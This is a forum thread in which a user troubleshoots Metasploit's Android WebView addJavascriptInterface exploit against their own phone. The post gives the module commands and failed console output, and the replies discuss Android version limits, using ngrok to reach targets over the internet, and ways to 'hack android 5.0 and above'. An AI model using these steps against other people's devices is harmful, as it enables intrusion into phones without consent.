Forum Thread: Trying to Get into My Android Device on Metasploit?

So I tried getting into my Android device (phone & tablet but it still didn't work) I'll post here what I did:

  1. I ran Metasploit
  1. Used this exploit "use exploit /android/browser/webview_addjavascriptinterface".
  1. I set my LHOST to the IP ADRESS on Kali (ifconfig)
  1. Set URIPATH: Security
  1. Exploit.
  1. Got my Local IP "http://192.168.X.X:8080/Security " I even tried the "Using URL" (http://0.0.0.0:8080/Security) but it didn't work.

7.All I got was:

msf exploit(webview_addjavascriptinterface) > * Using URL: http://0.0.0.0:8080/Security
* Local IP: http://192.168.X.X:8080/Security
* Server started.
* 192.168.X.1 webview_addjavascriptinterface - Gathering target information for 192.168.X.1
* 192.168.X.1 webview_addjavascriptinterface - Sending HTML response to 192.168.X.1

! 192.168.X.1 webviewaddjavascriptinterface - Exploit requirement(s) not met: vulntest. For more info: http://r-7.co/PVbcgx

! 192.168.X.1 webview_addjavascriptinterface - No vulnerable Java objects were found in this web context.

9 Responses

So what if the target is an Android 5.2 or higher?
And i also discovered that they must be on the same network connection before it will work.

same problem???????? I used above suggestion but it also does not work

you can use it on wan using http ngrok but you can't hack any android device,must be under 4.2 android version

im using an emulator android version 4.0 still not working , any ideas ?

I get this error
Exploit failed bad-config: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080)

Type
lsof -t -i:port number(4444 or 8080)
It will show u service number like"1508"
Kill that service by typing..
Kill 1508(service number)

any other way to hack android 5.0 and above , not by sending payload

Share Your Thoughts

  • Hot
  • Active